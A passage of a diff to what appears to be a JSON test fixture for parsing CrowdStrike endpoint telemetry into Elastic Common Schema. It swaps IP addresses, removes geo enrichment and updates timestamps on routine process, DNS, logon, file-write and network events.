--ps2\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3765958535\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"ImageFileName\":\"\\\\Device\\\\HarddiskVolume2\\\\projects\\\\splunk-forwarder\\\\bin\\\\splunk-powershell.exe\",\"ImageSubsystem\":\"3\",\"IntegrityLevel\":\"16384\",\"MD5HashData\":\"571391f723a439e985a2064337e2802a\",\"ParentAuthenticationId\":\"999\",\"ParentBaseFileName\":\"splunkd.exe\",\"ParentProcessId\":\"17346335177\",\"ProcessCreateFlags\":\"67634688\",\"ProcessEndTime\":\"\",\"ProcessParameterFlags\":\"24577\",\"ProcessStartTime\":\"1604855099.406\",\"ProcessSxsFlags\":\"64\",\"RawProcessId\":\"6116\",\"SHA1HashData\":\"0000000000000000000000000000000000000000\",\"SHA256HashData\":\"7f326aad0ee45bfef93daede5597d70422d472084ae3295762654fb5021a8720\",\"SessionId\":\"0\",\"SourceProcessId\":\"17346335177\",\"SourceThreadId\":\"107650023406\",\"Tags\":\"27, 151, 12094627905582, 12094627906234\",\"TargetProcessId\":\"583707537390\",\"TokenType\":\"1\",\"UserSid\":\"S-1-5-18\",\"WindowFlags\":\"384\",\"aid\":\"ffffffff3a5a424fa02450da53619745\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"ProcessRollup2\",\"id\":\"ffffffff-1111-11eb-a09e-06f79d630255\",\"name\":\"ProcessRollup2V17\",\"timestamp\":\"1604855100030\"}", "created": "2020-11-08T17:05:00.030Z", "kind": "event", "action": "ProcessRollup2", @@ -7125,21 +6269,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.216.144.255", - "vendor": "crowdstrike", - "ip": "208.216.144.255", "serial_number": "ffffffff4f1444bab96568879cb43556", + "address": "67.43.156.13", "type": "agent", - "version": "1007.3.0011603.1" + "version": "1007.3.0011603.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2020-11-08T17:04:55.961Z", "ecs": { @@ -7147,18 +6282,18 @@ }, "related": { "hosts": [ - "208.216.144.255" + "67.43.156.13" ], "hash": [ "2784638081" ], "ip": [ - "208.216.144.255" + "67.43.156.13" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465981800Z", - "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"2784638081\",\"ContextProcessId\":\"259090530891\",\"ContextThreadId\":\"16409623709004\",\"ContextTimeStamp\":\"1604855095.961\",\"DnsRequestCount\":\"1\",\"DomainName\":\"comp1.dom2\",\"DualRequest\":\"0\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"InterfaceIndex\":\"0\",\"RequestType\":\"1\",\"aid\":\"ffffffff4f1444bab96568879cb43556\",\"aip\":\"208.216.144.255\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"DnsRequest\",\"id\":\"ffffffff-1111-11eb-8077-0606f7dcf2ed\",\"name\":\"DnsRequestV3\",\"timestamp\":\"1604855099913\"}", + "ingested": "2021-12-09T13:36:11.151092400Z", + "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"2784638081\",\"ContextProcessId\":\"259090530891\",\"ContextThreadId\":\"16409623709004\",\"ContextTimeStamp\":\"1604855095.961\",\"DnsRequestCount\":\"1\",\"DomainName\":\"comp1.dom2\",\"DualRequest\":\"0\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"InterfaceIndex\":\"0\",\"RequestType\":\"1\",\"aid\":\"ffffffff4f1444bab96568879cb43556\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"DnsRequest\",\"id\":\"ffffffff-1111-11eb-8077-0606f7dcf2ed\",\"name\":\"DnsRequestV3\",\"timestamp\":\"1604855099913\"}", "created": "2020-11-08T17:04:59.913Z", "kind": "event", "action": "DnsRequest", @@ -7199,21 +6334,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.216.150.197", - "vendor": "crowdstrike", - "ip": "208.216.150.197", "serial_number": "ffffffff32ba43a483e76c6f0a4aa26f", + "address": "67.43.156.13", "type": "agent", - "version": "1007.8.0009806.1" + "version": "1007.8.0009806.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2020-11-08T17:05:01.645Z", "file": { @@ -7227,18 +6353,18 @@ }, "related": { "hosts": [ - "208.216.150.197" + "67.43.156.13" ], "hash": [ "4288861242" ], "ip": [ - "208.216.150.197" + "67.43.156.13" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465991100Z", - "original": "{\"ConfigBuild\":\"1007.8.0009806.1\",\"ConfigStateHash\":\"4288861242\",\"ContextProcessId\":\"321385820045701199\",\"ContextThreadId\":\"0\",\"ContextTimeStamp\":\"1604855101.645\",\"Entitlements\":\"15\",\"GID\":\"0\",\"TargetFileName\":\"/etc/shadow\",\"UID\":\"0\",\"UnixMode\":\"32768\",\"aid\":\"ffffffff32ba43a483e76c6f0a4aa26f\",\"aip\":\"208.216.150.197\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Lin\",\"event_simpleName\":\"CriticalFileAccessed\",\"id\":\"ffffffff-1111-11eb-b70d-027f9ced2001\",\"name\":\"CriticalFileAccessedLinV1\",\"timestamp\":\"1604855102247\"}", + "ingested": "2021-12-09T13:36:11.151098800Z", + "original": "{\"ConfigBuild\":\"1007.8.0009806.1\",\"ConfigStateHash\":\"4288861242\",\"ContextProcessId\":\"321385820045701199\",\"ContextThreadId\":\"0\",\"ContextTimeStamp\":\"1604855101.645\",\"Entitlements\":\"15\",\"GID\":\"0\",\"TargetFileName\":\"/etc/shadow\",\"UID\":\"0\",\"UnixMode\":\"32768\",\"aid\":\"ffffffff32ba43a483e76c6f0a4aa26f\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Lin\",\"event_simpleName\":\"CriticalFileAccessed\",\"id\":\"ffffffff-1111-11eb-b70d-027f9ced2001\",\"name\":\"CriticalFileAccessedLinV1\",\"timestamp\":\"1604855102247\"}", "created": "2020-11-08T17:05:02.247Z", "kind": "alert", "action": "CriticalFileAccessed", @@ -7299,21 +6425,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.14.207.30", - "vendor": "crowdstrike", - "ip": "208.14.207.30", "serial_number": "ffffffff1aa0482a5ea94f64e08e7b15", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0009304.1" + "version": "1007.4.0009304.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2020-11-08T17:05:09.180Z", "ecs": { @@ -7321,7 +6438,7 @@ }, "related": { "hosts": [ - "208.14.207.30" + "67.43.156.14" ], "hash": [ "d51cef1b288e2032aee9805deff04bfd", @@ -7329,12 +6446,12 @@ "3344040805" ], "ip": [ - "208.14.207.30" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465998200Z", - "original": "{\"CommandLine\":\"/usr/bin/plutil -convert xml1 -o - /Applications/Xcode.app/Contents/Developer/Platforms/AppleTVOS.platform/Developer/Library/CoreSimulator/Profiles/Runtimes/tvOS.simruntime/Contents/Resources/RuntimeRoot/System/Library/PrivateFrameworks/DiagnosticExtensions.framework/PlugIns/com.apple.DiagnosticExtensions.CrashLogs.appex/Info.plist\",\"ConfigBuild\":\"1007.4.0009304.1\",\"ConfigStateHash\":\"3344040805\",\"Entitlements\":\"15\",\"GID\":\"0\",\"ImageFileName\":\"/usr/bin/plutil\",\"MD5HashData\":\"d51cef1b288e2032aee9805deff04bfd\",\"MachOSubType\":\"1\",\"ParentProcessId\":\"311774817965726568\",\"ProcessEndTime\":\"\",\"ProcessGroupId\":\"311774817965726568\",\"ProcessStartTime\":\"1604855111.240\",\"RGID\":\"0\",\"RUID\":\"0\",\"RawProcessId\":\"10692\",\"SHA1HashData\":\"0000000000000000000000000000000000000000\",\"SHA256HashData\":\"3b00897e1eb587c5f77e3866ff6bdc80f5e70f839543242e0ee5a1581014adc3\",\"SVGID\":\"0\",\"SVUID\":\"0\",\"SourceProcessId\":\"311776004953765502\",\"SourceThreadId\":\"0\",\"Tags\":\"27, 12094627905582, 12094627906234\",\"TargetProcessId\":\"311776004953765502\",\"UID\":\"0\",\"aid\":\"ffffffff1aa0482a5ea94f64e08e7b15\",\"aip\":\"208.14.207.30\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"ProcessRollup2\",\"id\":\"ffffffff-1111-11eb-bc03-065126dd0691\",\"name\":\"ProcessRollup2MacV3\",\"timestamp\":\"1604855109180\"}", + "ingested": "2021-12-09T13:36:11.151105100Z", + "original": "{\"CommandLine\":\"/usr/bin/plutil -convert xml1 -o - /Applications/Xcode.app/Contents/Developer/Platforms/AppleTVOS.platform/Developer/Library/CoreSimulator/Profiles/Runtimes/tvOS.simruntime/Contents/Resources/RuntimeRoot/System/Library/PrivateFrameworks/DiagnosticExtensions.framework/PlugIns/com.apple.DiagnosticExtensions.CrashLogs.appex/Info.plist\",\"ConfigBuild\":\"1007.4.0009304.1\",\"ConfigStateHash\":\"3344040805\",\"Entitlements\":\"15\",\"GID\":\"0\",\"ImageFileName\":\"/usr/bin/plutil\",\"MD5HashData\":\"d51cef1b288e2032aee9805deff04bfd\",\"MachOSubType\":\"1\",\"ParentProcessId\":\"311774817965726568\",\"ProcessEndTime\":\"\",\"ProcessGroupId\":\"311774817965726568\",\"ProcessStartTime\":\"1604855111.240\",\"RGID\":\"0\",\"RUID\":\"0\",\"RawProcessId\":\"10692\",\"SHA1HashData\":\"0000000000000000000000000000000000000000\",\"SHA256HashData\":\"3b00897e1eb587c5f77e3866ff6bdc80f5e70f839543242e0ee5a1581014adc3\",\"SVGID\":\"0\",\"SVUID\":\"0\",\"SourceProcessId\":\"311776004953765502\",\"SourceThreadId\":\"0\",\"Tags\":\"27, 12094627905582, 12094627906234\",\"TargetProcessId\":\"311776004953765502\",\"UID\":\"0\",\"aid\":\"ffffffff1aa0482a5ea94f64e08e7b15\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"ProcessRollup2\",\"id\":\"ffffffff-1111-11eb-bc03-065126dd0691\",\"name\":\"ProcessRollup2MacV3\",\"timestamp\":\"1604855109180\"}", "created": "2020-11-08T17:05:09.180Z", "kind": "event", "action": "ProcessRollup2", @@ -7389,21 +6506,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.216.150.210", - "vendor": "crowdstrike", - "ip": "208.216.150.210", "serial_number": "ffffffff8f1e4b77b4dae5debaa1c8bc", + "address": "67.43.156.13", "type": "agent", - "version": "1007.3.0011603.1" + "version": "1007.3.0011603.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2020-11-08T17:05:14.133Z", "file": { @@ -7419,18 +6527,18 @@ }, "related": { "hosts": [ - "208.216.150.210" + "67.43.156.13" ], "hash": [ "3899738370" ], "ip": [ - "208.216.150.210" + "67.43.156.13" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466005Z", - "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3899738370\",\"ContextProcessId\":\"1546527409909\",\"ContextThreadId\":\"4711690090889\",\"ContextTimeStamp\":\"1604855114.133\",\"DesiredAccess\":\"1180054\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileAttributes\":\"0\",\"FileIdentifier\":\"501ee2c32e53fb43b07f419f3236fb45c29e000000002c00\",\"FileObject\":\"18446655033844205120\",\"Information\":\"2\",\"IrpFlags\":\"2180\",\"MajorFunction\":\"0\",\"MinorFunction\":\"0\",\"OperationFlags\":\"0\",\"Options\":\"88080484\",\"ShareAccess\":\"1\",\"Status\":\"0\",\"TargetFileName\":\"\\\\Device\\\\HarddiskVolume4\\\\Windows\\\\Temp\\\\__PSScriptPolicyTest_dvkjnbka.apn.ps1\",\"aid\":\"ffffffff8f1e4b77b4dae5debaa1c8bc\",\"aip\":\"208.216.150.210\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"NewScriptWritten\",\"id\":\"ffffffff-1111-11eb-80b5-06e11a66e03d\",\"name\":\"NewScriptWrittenV7\",\"timestamp\":\"1604855114427\"}", + "ingested": "2021-12-09T13:36:11.151111400Z", + "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3899738370\",\"ContextProcessId\":\"1546527409909\",\"ContextThreadId\":\"4711690090889\",\"ContextTimeStamp\":\"1604855114.133\",\"DesiredAccess\":\"1180054\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileAttributes\":\"0\",\"FileIdentifier\":\"501ee2c32e53fb43b07f419f3236fb45c29e000000002c00\",\"FileObject\":\"18446655033844205120\",\"Information\":\"2\",\"IrpFlags\":\"2180\",\"MajorFunction\":\"0\",\"MinorFunction\":\"0\",\"OperationFlags\":\"0\",\"Options\":\"88080484\",\"ShareAccess\":\"1\",\"Status\":\"0\",\"TargetFileName\":\"\\\\Device\\\\HarddiskVolume4\\\\Windows\\\\Temp\\\\__PSScriptPolicyTest_dvkjnbka.apn.ps1\",\"aid\":\"ffffffff8f1e4b77b4dae5debaa1c8bc\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"NewScriptWritten\",\"id\":\"ffffffff-1111-11eb-80b5-06e11a66e03d\",\"name\":\"NewScriptWrittenV7\",\"timestamp\":\"1604855114427\"}", "created": "2020-11-08T17:05:14.427Z", "kind": "event", "action": "NewScriptWritten", @@ -7470,27 +6578,9 @@ "type": "macos" }, "destination": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-WI", - "city_name": "Superior", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Wisconsin", - "location": { - "lon": -92.095, - "lat": 46.7045 - } - }, - "as": { - "number": 3789, - "organization": { - "name": "Essentia Health East" - } - }, - "address": "208.72.48.107", "port": 443, - "ip": "208.72.48.107" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "source": { "port": 0, @@ -7509,21 +6599,12 @@ "direction": "inbound" }, "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.216.150.211", - "vendor": "crowdstrike", - "ip": "208.216.150.211", "serial_number": "ffffffffd4094240a6b1d12aaf304f4f", + "address": "67.43.156.13", "type": "agent", - "version": "1007.4.0012205.1" + "version": "1007.4.0012205.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2020-11-08T17:05:16.421Z", "ecs": { @@ -7531,22 +6612,22 @@ }, "related": { "hosts": [ - "208.216.150.211", + "67.43.156.13", "0.0.0.0", - "208.72.48.107" + "67.43.156.14" ], "hash": [ "1306766522" ], "ip": [ - "208.216.150.211", + "67.43.156.13", "0.0.0.0", - "208.72.48.107" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466011700Z", - "original": "{\"ConfigBuild\":\"1007.4.0012205.1\",\"ConfigStateHash\":\"1306766522\",\"ConnectionDirection\":\"1\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"321275232072440993\",\"ContextTimeStamp\":\"1604855116.421\",\"Entitlements\":\"15\",\"InContext\":\"0\",\"LocalAddressIP4\":\"0.0.0.0\",\"LocalPort\":\"0\",\"Protocol\":\"6\",\"RemoteAddressIP4\":\"208.72.48.107\",\"RemotePort\":\"443\",\"aid\":\"ffffffffd4094240a6b1d12aaf304f4f\",\"aip\":\"208.216.150.211\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"NetworkConnectIP4\",\"id\":\"ffffffff-1111-11eb-aca9-02683aed2a0d\",\"name\":\"NetworkConnectIP4MacV5\",\"timestamp\":\"1604855116502\"}", + "ingested": "2021-12-09T13:36:11.151117800Z", + "original": "{\"ConfigBuild\":\"1007.4.0012205.1\",\"ConfigStateHash\":\"1306766522\",\"ConnectionDirection\":\"1\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"321275232072440993\",\"ContextTimeStamp\":\"1604855116.421\",\"Entitlements\":\"15\",\"InContext\":\"0\",\"LocalAddressIP4\":\"0.0.0.0\",\"LocalPort\":\"0\",\"Protocol\":\"6\",\"RemoteAddressIP4\":\"67.43.156.14\",\"RemotePort\":\"443\",\"aid\":\"ffffffffd4094240a6b1d12aaf304f4f\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"NetworkConnectIP4\",\"id\":\"ffffffff-1111-11eb-aca9-02683aed2a0d\",\"name\":\"NetworkConnectIP4MacV5\",\"timestamp\":\"1604855116502\"}", "created": "2020-11-08T17:05:16.502Z", "kind": "event", "action": "NetworkConnectIP4", @@ -7577,44 +6658,14 @@ "type": "windows" }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 6296, - "organization": { - "name": "InfoStructure" - } - }, - "address": "208.91.140.216", "port": 443, - "ip": "208.91.140.216" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 1239, - "organization": { - "name": "Sprint" - } - }, - "address": "208.22.254.101", "port": 53961, - "ip": "208.22.254.101" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "url": { "scheme": "http" @@ -7623,27 +6674,18 @@ "preserve_original_event" ], "network": { - "community_id": "1:Xm3jgwymKS3jTxcXdD1IsruCeU8=", + "community_id": "1:gnQhhn0wJhJU+wrHlczmnm7THKs=", "transport": "tcp", "iana_number": "6", "direction": "outbound" }, "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.216.150.194", - "vendor": "crowdstrike", - "ip": "208.216.150.194", "serial_number": "fffffffff000426eb99afaa2ccdcbc17", + "address": "67.43.156.13", "type": "agent", - "version": "1007.3.0011603.1" + "version": "1007.3.0011603.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2020-11-08T17:05:16.849Z", "ecs": { @@ -7651,22 +6693,20 @@ }, "related": { "hosts": [ - "208.216.150.194", - "208.22.254.101", - "208.91.140.216" + "67.43.156.13", + "67.43.156.14" ], "hash": [ "2602391615" ], "ip": [ - "208.216.150.194", - "208.22.254.101", - "208.91.140.216" + "67.43.156.13", + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466018500Z", - "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"2602391615\",\"ConnectionDirection\":\"0\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"223442259384\",\"ContextTimeStamp\":\"1604855116.849\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"InContext\":\"0\",\"LocalAddressIP4\":\"208.22.254.101\",\"LocalPort\":\"53961\",\"Protocol\":\"6\",\"RemoteAddressIP4\":\"208.91.140.216\",\"RemotePort\":\"443\",\"aid\":\"fffffffff000426eb99afaa2ccdcbc17\",\"aip\":\"208.216.150.194\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"NetworkConnectIP4\",\"id\":\"ffffffff-1111-11eb-b0eb-06be7616c211\",\"name\":\"NetworkConnectIP4V5\",\"timestamp\":\"1604855116942\"}", + "ingested": "2021-12-09T13:36:11.151124100Z", + "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"2602391615\",\"ConnectionDirection\":\"0\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"223442259384\",\"ContextTimeStamp\":\"1604855116.849\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"InContext\":\"0\",\"LocalAddressIP4\":\"67.43.156.14\",\"LocalPort\":\"53961\",\"Protocol\":\"6\",\"RemoteAddressIP4\":\"67.43.156.14\",\"RemotePort\":\"443\",\"aid\":\"fffffffff000426eb99afaa2ccdcbc17\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"NetworkConnectIP4\",\"id\":\"ffffffff-1111-11eb-b0eb-06be7616c211\",\"name\":\"NetworkConnectIP4V5\",\"timestamp\":\"1604855116942\"}", "created": "2020-11-08T17:05:16.942Z", "kind": "event", "action": "NetworkConnectIP4", @@ -7707,21 +6747,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.216.128.255", - "vendor": "crowdstrike", - "ip": "208.216.128.255", "serial_number": "ffffffff8d2e4b4f9b21b40633a8d579", + "address": "67.43.156.13", "type": "agent", - "version": "1007.3.0011603.1" + "version": "1007.3.0011603.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2020-11-08T17:04:51.781Z", "ecs": { @@ -7733,18 +6764,18 @@ "user4" ], "hosts": [ - "208.216.128.255" + "67.43.156.13" ], "hash": [ "3011122681" ], "ip": [ - "208.216.128.255" + "67.43.156.13" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466025200Z", - "original": "{\"AuthenticationId\":\"6580764513\",\"AuthenticationPackage\":\"Negotiate\",\"ClientComputerName\":\"-\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3011122681\",\"ContextProcessId\":\"816054990879\",\"ContextThreadId\":\"52913017705957\",\"ContextTimeStamp\":\"1604855091.781\",\"EffectiveTransmissionClass\":\"2\",\"Entitlements\":\"15\",\"LogonDomain\":\"NT AUTHORITY\",\"LogonServer\":\"\",\"LogonTime\":\"1604855091.781\",\"LogonType\":\"9\",\"PasswordLastSet\":\"\",\"RemoteAccount\":\"1\",\"UserFlags\":\"0\",\"UserIsAdmin\":\"0\",\"UserLogonFlags\":\"12\",\"UserName\":\"SYSTEM\",\"UserPrincipal\":\"user4@dom2\",\"UserSid\":\"S-1-5-18\",\"aid\":\"ffffffff8d2e4b4f9b21b40633a8d579\",\"aip\":\"208.216.128.255\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"UserLogon\",\"id\":\"ffffffff-1111-11eb-a8cf-0649c95cfa1d\",\"name\":\"UserLogonV8\",\"timestamp\":\"1604855121077\"}", + "ingested": "2021-12-09T13:36:11.151130300Z", + "original": "{\"AuthenticationId\":\"6580764513\",\"AuthenticationPackage\":\"Negotiate\",\"ClientComputerName\":\"-\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3011122681\",\"ContextProcessId\":\"816054990879\",\"ContextThreadId\":\"52913017705957\",\"ContextTimeStamp\":\"1604855091.781\",\"EffectiveTransmissionClass\":\"2\",\"Entitlements\":\"15\",\"LogonDomain\":\"NT AUTHORITY\",\"LogonServer\":\"\",\"LogonTime\":\"1604855091.781\",\"LogonType\":\"9\",\"PasswordLastSet\":\"\",\"RemoteAccount\":\"1\",\"UserFlags\":\"0\",\"UserIsAdmin\":\"0\",\"UserLogonFlags\":\"12\",\"UserName\":\"SYSTEM\",\"UserPrincipal\":\"user4@dom2\",\"UserSid\":\"S-1-5-18\",\"aid\":\"ffffffff8d2e4b4f9b21b40633a8d579\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"UserLogon\",\"id\":\"ffffffff-1111-11eb-a8cf-0649c95cfa1d\",\"name\":\"UserLogonV8\",\"timestamp\":\"1604855121077\"}", "created": "2020-11-08T17:05:21.077Z", "kind": "event", "action": "UserLogon", @@ -7797,21 +6828,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.216.144.255", - "vendor": "crowdstrike", - "ip": "208.216.144.255", "serial_number": "ffffffff2c47454cba360bc404a607bb", + "address": "67.43.156.13", "type": "agent", - "version": "1007.3.0011603.1" + "version": "1007.3.0011603.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2020-11-08T17:05:20.785Z", "file": { @@ -7832,19 +6854,19 @@ }, "related": { "hosts": [ - "208.216.144.255" + "67.43.156.13" ], "hash": [ "d0e1b81f3f3f18256f6447703624019eaee9b1068b3f09323eced4f547cc4182", "3011122681" ], "ip": [ - "208.216.144.255" + "67.43.156.13" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466032Z", - "original": "{\"AuthenticationId\":\"2007206396\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3011122681\",\"ContextProcessId\":\"4415814628770\",\"ContextThreadId\":\"41392001729898\",\"ContextTimeStamp\":\"1604855120.785\",\"DiskParentDeviceInstanceId\":\"PCI\\\\VEN_1000\\u0026DEV_0054\\u0026SUBSYS_197615AD\\u0026REV_01\\\\4\\u00261f16fef7\\u00260\\u002600A8\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileEcpBitmask\":\"0\",\"FileIdentifier\":\"b57cb59769dfe71180b4806e6f6e6963ea8902000000cb2c\",\"FileObject\":\"18446708893089967904\",\"IrpFlags\":\"1028\",\"IsOnNetwork\":\"0\",\"IsOnRemovableDisk\":\"0\",\"IsTransactedFile\":\"0\",\"MajorFunction\":\"18\",\"MinorFunction\":\"0\",\"OperationFlags\":\"0\",\"SHA256HashData\":\"d0e1b81f3f3f18256f6447703624019eaee9b1068b3f09323eced4f547cc4182\",\"Size\":\"6144\",\"TargetFileName\":\"\\\\Device\\\\HarddiskVolume2\\\\Users\\\\user10\\\\AppData\\\\Local\\\\Temp\\\\ec1ijefl.dll\",\"TokenType\":\"1\",\"aid\":\"ffffffff2c47454cba360bc404a607bb\",\"aip\":\"208.216.144.255\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"PeFileWritten\",\"id\":\"ffffffff-1111-11eb-b091-06f6cca0a049\",\"name\":\"PeFileWrittenV14\",\"timestamp\":\"1604855121109\"}", + "ingested": "2021-12-09T13:36:11.151136700Z", + "original": "{\"AuthenticationId\":\"2007206396\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3011122681\",\"ContextProcessId\":\"4415814628770\",\"ContextThreadId\":\"41392001729898\",\"ContextTimeStamp\":\"1604855120.785\",\"DiskParentDeviceInstanceId\":\"PCI\\\\VEN_1000\\u0026DEV_0054\\u0026SUBSYS_197615AD\\u0026REV_01\\\\4\\u00261f16fef7\\u00260\\u002600A8\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileEcpBitmask\":\"0\",\"FileIdentifier\":\"b57cb59769dfe71180b4806e6f6e6963ea8902000000cb2c\",\"FileObject\":\"18446708893089967904\",\"IrpFlags\":\"1028\",\"IsOnNetwork\":\"0\",\"IsOnRemovableDisk\":\"0\",\"IsTransactedFile\":\"0\",\"MajorFunction\":\"18\",\"MinorFunction\":\"0\",\"OperationFlags\":\"0\",\"SHA256HashData\":\"d0e1b81f3f3f18256f6447703624019eaee9b1068b3f09323eced4f547cc4182\",\"Size\":\"6144\",\"TargetFileName\":\"\\\\Device\\\\HarddiskVolume2\\\\Users\\\\user10\\\\AppData\\\\Local\\\\Temp\\\\ec1ijefl.dll\",\"TokenType\":\"1\",\"aid\":\"ffffffff2c47454cba360bc404a607bb\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"PeFileWritten\",\"id\":\"ffffffff-1111-11eb-b091-06f6cca0a049\",\"name\":\"PeFileWrittenV14\",\"timestamp\":\"1604855121109\"}", "created": "2020-11-08T17:05:21.109Z", "kind": "event", "action": "PeFileWritten", @@ -7887,21 +6909,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.216.134.211", - "vendor": "crowdstrike", - "ip": "208.216.134.211", "serial_number": "ffffffffe0104823bd3de859d5bc8bc7", + "address": "67.43.156.13", "type": "agent", - "version": "1007.3.0011603.1" + "version": "1007.3.0011603.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2020-11-08T17:05:34.461Z", 